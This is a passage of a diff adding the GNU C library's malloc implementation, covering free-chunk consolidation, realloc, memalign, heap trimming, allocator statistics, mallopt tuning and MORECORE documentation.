+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      (void)mutex_unlock(&av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, 0);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = p->size & ~(PREV_INUSE|NON_MAIN_ARENA);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = p->prev_size;
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (oldp->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (next->size <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          newp->prev_size = p->prev_size + leadsize;
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+        return chunksize (p) - 2 * SIZE_SZ;
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = mp_.max_total_mem;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      (void) mutex_unlock (&ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  (void) mutex_lock (&av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      LIBC_PROBE (memory_mallopt_trim_threshold, 3, value,
+                  mp_.trim_threshold, mp_.no_dyn_threshold);
+      mp_.trim_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_TOP_PAD:
+      LIBC_PROBE (memory_mallopt_top_pad, 3, value,
+                  mp_.top_pad, mp_.no_dyn_threshold);
+      mp_.top_pad = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_MMAP_THRESHOLD:
+      /* Forbid setting the threshold too high. */
+      if ((unsigned long) value > HEAP_MAX_SIZE / 2)
+        res = 0;
+      else
+        {
+          LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value,
+                      mp_.mmap_threshold, mp_.no_dyn_threshold);
+          mp_.mmap_threshold = value;
+          mp_.no_dyn_threshold = 1;
+        }
+      break;
+
+    case M_MMAP_MAX:
+      LIBC_PROBE (memory_mallopt_mmap_max, 3, value,
+                  mp_.n_mmaps_max, mp_.no_dyn_threshold);
+      mp_.n_mmaps_max = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_CHECK_ACTION:
+      LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+      check_action = value;
+      break;
+
+    case M_PERTURB:
+      LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+      perturb_byte = value;
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+          mp_.arena_test = value;
+        }
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+          mp_.arena_max = value;
+        }
+      break;
+    }
+  (void) mutex_unlock (&av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
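+
+/*
+   For instance, if you want this malloc to obtain all of its memory from
+   mmap, the guidance above can be followed with a trivial MORECORE
+   replacement that always reports failure.  A minimal sketch (the name
+   fail_morecore is only illustrative):
+
+   static void *fail_morecore(ptrdiff_t increment)
+   {
+     return (void *) MORECORE_FAILURE;
+   }
+
+   #define MORECORE fail_morecore
+   #define MORECORE_CONTIGUOUS 0
+ */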
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message (action & 2, "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      mutex_lock (&ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r->size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r->size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r->size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      mutex_unlock (&ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
